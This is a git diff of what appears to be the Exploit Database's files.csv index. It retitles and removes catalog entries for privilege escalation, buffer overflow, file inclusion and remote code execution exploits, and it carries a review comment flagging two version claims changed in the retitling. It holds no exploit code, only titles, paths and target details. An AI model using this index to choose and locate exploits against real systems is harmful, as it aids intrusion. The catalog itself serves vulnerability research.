diff --git a/files.csv b/files.csv
index 2c44dadc7..5043c24b4 100644
--- a/files.csv
+++ b/files.csv
@@ -4793,7 +4793,7 @@ id,file,description,date,author,platform,type,port
 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
 38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0
-38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
+38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
 38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0
 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0
 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0
@@ -5735,7 +5735,7 @@ id,file,description,date,author,platform,type,port
 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) - Local Exploit",2004-08-18,anonymous,windows,local,0
 411,platforms/linux/local/411.c,"Sendmail 8.11.x (Linux/i386) - Exploit",2001-01-01,sd,linux,local,0
-417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Privilege Escalation (Brute Force Exploit)",2004-08-25,Bytes,linux,local,0
+417,platforms/linux/local/417.c,"SquirrelMail - 'chpasswd' Local Privilege Escalation (Brute Force)",2004-08-25,Bytes,linux,local,0
 434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0
 438,platforms/linux/local/438.c,"CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation",2004-09-11,I)ruid,linux,local,0
 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0
@@ -6205,7 +6205,7 @@ id,file,description,date,author,platform,type,port
 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0
 7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
-40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
+40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA Root Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0
 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - 'runtime.getRuntime().exec()' Privilege Escalation",2008-11-28,Abysssec,windows,local,0
 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0
 7313,platforms/linux/local/7313.sh,"Debian - (Symlink In Login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0
@@ -6720,7 +6720,7 @@ id,file,description,date,author,platform,type,port
 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0
 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0
 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
-13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow DEP Bypass",2010-06-08,mr_me,php,local,0
+13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local,0
 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0
@@ -7184,7 +7184,7 @@ id,file,description,date,author,platform,type,port
 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - (SEH + ASLR + DEP Bypass)",2012-04-03,b33f,windows,local,0
 18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow (Metasploit)",2012-04-06,Metasploit,windows,local,0
 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
-18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0
+18733,platforms/linux/local/18733.py,"WICD 1.7.1 - Local Privilege Escalation",2012-04-12,anonymous,linux,local,0
 18749,platforms/osx/local/18749.py,"Microsoft Office 2008 SP0 (Mac) - RTF pFragments Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
 18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow (Metasploit)",2012-04-18,Metasploit,windows,local,0
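Review bot: The rewritten 18733 description adds a version, `WICD 1.7.1`, that the removed line did not carry and nothing in this hunk supports; a title cleanup should not introduce a new factual claim unless it has been checked against the exploit file's own header. The same class of change appears for 42334 in the hunk at `@@ -9128,15 +9128,15 @@`, where `<= 4.0.20` becomes `< 4.0.20`: that turns an inclusive affected-version bound into an exclusive one and drops 4.0.20 itself from the stated range, which is a substantive edit rather than a punctuation fix. If only the capitalisation and spelling were meant to change there, the line should keep `<= 4.0.20`.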
@@ -8821,7 +8821,7 @@ id,file,description,date,author,platform,type,port
 39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
 39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Escalation",2016-02-29,Laughing_Mantis,windows,local,0
-39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
+39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 / M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
 39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0
 39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0
 39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
@@ -9128,15 +9128,15 @@ id,file,description,date,author,platform,type,port
 42255,platforms/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Buffer Overflow",2017-06-26,"Juan Sacco",linux,local,0
 42265,platforms/linux/local/42265.py,"Flat Assembler 1.7.21 - Buffer Overflow",2017-06-28,"Juan Sacco",linux,local,0
 42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0
-42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",solaris_x86,local,0
-42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",openbsd,local,0
+42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0
+42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0
 42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
-42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
-42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
+42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
+42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
-42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion <= 4.0.20 - Local root Privilege Esclation",2017-07-18,"Mark Wadham",macos,local,0
+42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -10710,7 +10710,6 @@ id,file,description,date,author,platform,type,port
 14522,platforms/windows/remote/14522.rb,"Xerver 4.32 - Source Disclosure / HTTP Authentication Bypass (Metasploit)",2010-08-01,"Ben Schmidt",windows,remote,0
 14539,platforms/windows/remote/14539.html,"FathFTP 1.8 - (RasIsConnected Method) ActiveX Buffer Overflow (SEH)",2010-08-03,Madjix,windows,remote,0
 14536,platforms/hardware/remote/14536.txt,"EMC Celerra NAS Appliance - Unauthorized Access to Root NFS Export",2010-08-03,"Trustwave's SpiderLabs",hardware,remote,0
-14547,platforms/windows/remote/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow",2010-08-03,"Nahuel Riva",windows,remote,0
 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 - (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0
 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 - (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0
@@ -10726,7 +10725,6 @@ id,file,description,date,author,platform,type,port
 14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal",2010-08-14,Unknown,multiple,remote,0
 14674,platforms/windows/remote/14674.txt,"Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)",2010-08-17,"Piotr Bania",windows,remote,0
 14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
-14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion / Remote Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
 14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - 'newclass' Invalid Pointer Exploit",2010-09-01,Abysssec,windows,remote,0
 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal",2010-09-01,chr1x,windows,remote,0
@@ -11614,7 +11612,6 @@ id,file,description,date,author,platform,type,port
 18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0
 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0
 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0
-18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution",2012-05-26,muts,linux,remote,0
 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0
 18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0
 18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0
@@ -12000,7 +11997,6 @@ id,file,description,date,author,platform,type,port
 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0
 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0
-20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion / Remote Command Execution",2012-07-24,muts,linux,remote,0
 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0
 20066,platforms/windows/remote/20066.java,"Michael Lamont Savant Web Server 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0
 20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0
@@ -13304,7 +13300,6 @@ id,file,description,date,author,platform,type,port
 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0
 23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0
 23873,platforms/multiple/remote/23873.c,"Mythic Entertainment Dark Age of Camelot 1.6x - Encryption Key Signing",2004-03-23,"Todd Chapman",multiple,remote,0
-23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan VirusWall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,remote,0
 23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0
 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0
 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun / Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0
@@ -13731,7 +13726,6 @@ id,file,description,date,author,platform,type,port
 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26004,platforms/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26006,platforms/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x - Unauthorized Report Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
-26012,platforms/windows/remote/26012.rb,"Novell Zenworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)",2013-06-07,Metasploit,windows,remote,80
 26013,platforms/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote,0
 26022,platforms/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote,0
 26024,platforms/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote,0
@@ -13824,7 +13818,6 @@ id,file,description,date,author,platform,type,port
 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure - ldapsyncnow.php Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443
 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443
 27319,platforms/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote,0
-27320,platforms/hardware/remote/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,remote,0
 27325,platforms/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote,0
 27326,platforms/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,linux,remote,0
 27378,platforms/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote,0
@@ -14164,7 +14157,6 @@ id,file,description,date,author,platform,type,port
 30809,platforms/windows/remote/30809.txt,"SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote,0
 30470,platforms/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000
 30471,platforms/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80
-30472,platforms/linux/remote/30472.rb,"Zimbra Collaboration Server 7.2.2/8.0.2 - Local File Inclusion (Metasploit)",2013-12-24,Metasploit,linux,remote,7071
 30473,platforms/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080
 30485,platforms/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - Forms/General_1 sysSystemName Parameter Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote,0
 30490,platforms/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote,0
@@ -14578,7 +14570,6 @@ id,file,description,date,author,platform,type,port
 33084,platforms/multiple/remote/33084.txt,"Oracle 9i/10g Database - Network Foundation Remote",2009-06-14,"Dennis Yurichev",multiple,remote,0
 33089,platforms/windows/remote/33089.pl,"iDefense COMRaider - ActiveX Control Multiple Insecure Method Vulnerabilities",2009-06-17,"Khashayar Fereidani",windows,remote,0
 33351,platforms/novell/remote/33351.pl,"Novell eDirectory 8.8 - '/dhost/modules?I:' Buffer Overflow",2009-11-12,HACKATTACK,novell,remote,0
-33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Inclusion",2009-07-16,MustLive,multiple,remote,0
 33580,platforms/hardware/remote/33580.txt,"COMTREND CT-507 IT ADSL Router - 'scvrtsrv.cmd' Cross-Site Scripting",2010-01-29,Yoyahack,hardware,remote,0
 33095,platforms/windows/remote/33095.rb,"Adobe Flash Player - Type Confusion Remote Code Execution (Metasploit)",2014-04-29,Metasploit,windows,remote,0
 33103,platforms/linux/remote/33103.html,"Mozilla Firefox 3.5.1 - Error Page Address Bar URI Spoofing",2009-06-24,"Juan Pablo Lopez Yacubian",linux,remote,0
@@ -14680,7 +14671,6 @@ id,file,description,date,author,platform,type,port
 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
 33712,platforms/windows/remote/33712.txt,"VideoLAN VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow",2010-03-05,"Gjoko Krstic",windows,remote,0
 33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
-33740,platforms/hardware/remote/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
 33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
 33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privilege Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0
 33750,platforms/windows/remote/33750.txt,"Microsoft Windows XP/2000 - Help File Relative Path Remote Command Execution",2010-03-06,Secumania,windows,remote,0
@@ -14942,7 +14932,6 @@ id,file,description,date,author,platform,type,port
 35386,platforms/linux/remote/35386.txt,"Logwatch Log File - Special Characters Privilege Escalation",2011-02-24,"Dominik George",linux,remote,0
 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - '.ksf' Remote Buffer Overflow",2011-02-28,KedAns-Dz,multiple,remote,0
 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x - '.dps' Remote Buffer Overflow",2011-02-28,KedAns-Dz,windows,remote,0
-35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Parameter Local File Inclusion",2011-03-04,"AutoSec Tools",windows,remote,0
 35420,platforms/hardware/remote/35420.txt,"IPUX Cube Type CS303C IP Camera - 'UltraMJCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
 35421,platforms/hardware/remote/35421.txt,"IPUX CL5452/CL5132 IP Camera - 'UltraSVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
 35422,platforms/hardware/remote/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - 'UltraHVCamX.ocx' ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,remote,0
@@ -14967,7 +14956,6 @@ id,file,description,date,author,platform,type,port
 35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting",2011-04-05,fazalmajid,multiple,remote,0
 35573,platforms/windows/remote/35573.txt,"Microsoft Excel - Buffer Overflow",2011-04-12,"Rodrigo Rubira Branco",windows,remote,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface - Remote Code Execution (Metasploit)",2014-12-19,"Patrick Webster",linux,remote,6082
-35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion / Remote Code Execution (Metasploit)",2014-12-22,"Patrick Webster",php,remote,9000
 35597,platforms/hardware/remote/35597.txt,"FiberHome HG-110 - Cross-Site Scripting / Directory Traversal",2011-04-08,Zerial,hardware,remote,0
 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 - kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0
 35612,platforms/windows/remote/35612.pl,"Winamp 5.6.1 - '.m3u8' Remote Buffer Overflow",2011-04-12,KedAns-Dz,windows,remote,0
@@ -15079,7 +15067,6 @@ id,file,description,date,author,platform,type,port
 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0
 36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote,0
 36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80
-36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0
 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 - Remote Command Execution (Metasploit)",2015-03-06,Metasploit,windows,remote,5555
 36318,platforms/windows/remote/36318.txt,"Jetty Web Server - Directory Traversal",2011-11-18,"Alexey Sintsov",windows,remote,0
@@ -15153,7 +15140,6 @@ id,file,description,date,author,platform,type,port
 36995,platforms/hardware/remote/36995.txt,"F5 FirePass 7.0 - SQL Injection",2012-03-14,anonymous,hardware,remote,0
 37169,platforms/linux/remote/37169.rb,"Realtek SDK - Miniigd UPnP SOAP Command Execution (Metasploit)",2015-06-01,Metasploit,linux,remote,52869
 36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router - Cross-Site Request Forgery (Multiple Function)",2012-02-21,Busindre,hardware,remote,0
-36865,platforms/hardware/remote/36865.txt,"Xavi 7968 ADSL Router - webconfig/lan/lan_config.html/local_lan_config host_name_txtbox Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
 36866,platforms/hardware/remote/36866.txt,"Xavi 7968 ADSL Router - webconfig/wan/confirm.html/confirm pvcName Parameter Cross-Site Scripting",2012-02-21,Busindre,hardware,remote,0
 36877,platforms/hardware/remote/36877.html,"Multiple D-Link DCS Products - 'security.cgi' Cross-Site Request Forgery",2012-02-23,"Rigan Iimrigan",hardware,remote,0
 36880,platforms/windows/remote/36880.rb,"Adobe Flash Player - UncompressViaZlibVariant Uninitialized Memory (Metasploit)",2015-05-01,Metasploit,windows,remote,0
@@ -15239,7 +15225,6 @@ id,file,description,date,author,platform,type,port
 37952,platforms/windows/remote/37952.py,"Easy Address Book Web Server 1.6 - USERID Remote Buffer Overflow",2015-08-24,"Tracy Turben",windows,remote,0
 37958,platforms/multiple/remote/37958.rb,"Mozilla Firefox - 'pdf.js' Privileged JavaScript Injection (Metasploit)",2015-08-24,Metasploit,multiple,remote,0
 37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI redirection",2012-10-21,"Aung Khant",hardware,remote,0
-37982,platforms/hardware/remote/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0
 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80
 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'Filename' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0
 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21
